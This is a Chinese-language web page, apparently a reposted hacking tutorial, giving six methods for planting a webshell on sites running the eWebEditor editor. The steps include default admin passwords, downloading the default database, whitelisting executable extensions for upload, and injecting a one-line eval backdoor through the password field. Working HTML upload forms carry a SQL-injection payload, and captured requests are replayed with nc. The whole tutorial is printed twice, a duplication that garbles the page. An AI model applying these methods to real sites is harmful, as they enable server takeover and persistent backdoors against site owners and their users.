脚本入侵 入侵ewebeditor编辑器一些技巧
网络安全 2021-07-03 09:36www.168986.cn网络安全知识
eWebEditor编辑器
建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址/ewebeditor/admin_login.asp
使用默认密码admin/admin 或 admin/admin888
不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:chouxiaozi 随便写
路径模式选择绝对路径
图片类型gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马
内容路径空 记得
图片限制写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马
拿webshell方法第二种方法
登陆后台,点击修改密码---新密码设置为 1":eval request("choxiaozi")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看
拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
先看eWebEditor/upload.asp 上传地址存在不
存在的话就把狼蚁网站SEO优化的代码保存为
H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H1><br><br>
<form action="这里写上传地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上传地址保存为chouxiaozi.HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
先看下ewebeditor/asp/upload.asp 上传地址存在不
存在就
把狼蚁网站SEO优化的代码
<form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存为chouxiaozi.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第六种方法
利用eWebEditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt
然后用编译C32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上传 百度搜索相关教程
回头说下有时候进了个网站后台-看到了eWebEditor编辑器 找不到eWebEditor目录地址
我们来点鼠标右键-查看源代码,找到仔细找eWebEditor的路径。
建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址/ewebeditor/admin_login.asp
使用默认密码admin/admin 或 admin/admin888
不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:chouxiaozi 随便写
路径模式选择绝对路径
图片类型gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马
内容路径空 记得
图片限制写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马
拿webshell方法第二种方法
登陆后台,点击修改密码---新密码设置为 1":eval request("choxiaozi")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看
拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
先看eWebEditor/upload.asp 上传地址存在不
存在的话就把狼蚁网站SEO优化的代码保存为
H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H1><br><br>
<form action="这里写上传地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上传地址保存为chouxiaozi.HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
先看下ewebeditor/asp/upload.asp 上传地址存在不
存在就
把狼蚁网站SEO优化的代码
<form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存为chouxiaozi.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第六种方法
利用eWebEditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt
然后用编译C32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上传 百度搜索相关教程
回头说下有时候进了个网站后台-看到了eWebEditor编辑器 找不到eWebEditor目录地址
我们来点鼠标右键-查看源代码,找到仔细找eWebEditor的路径。
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座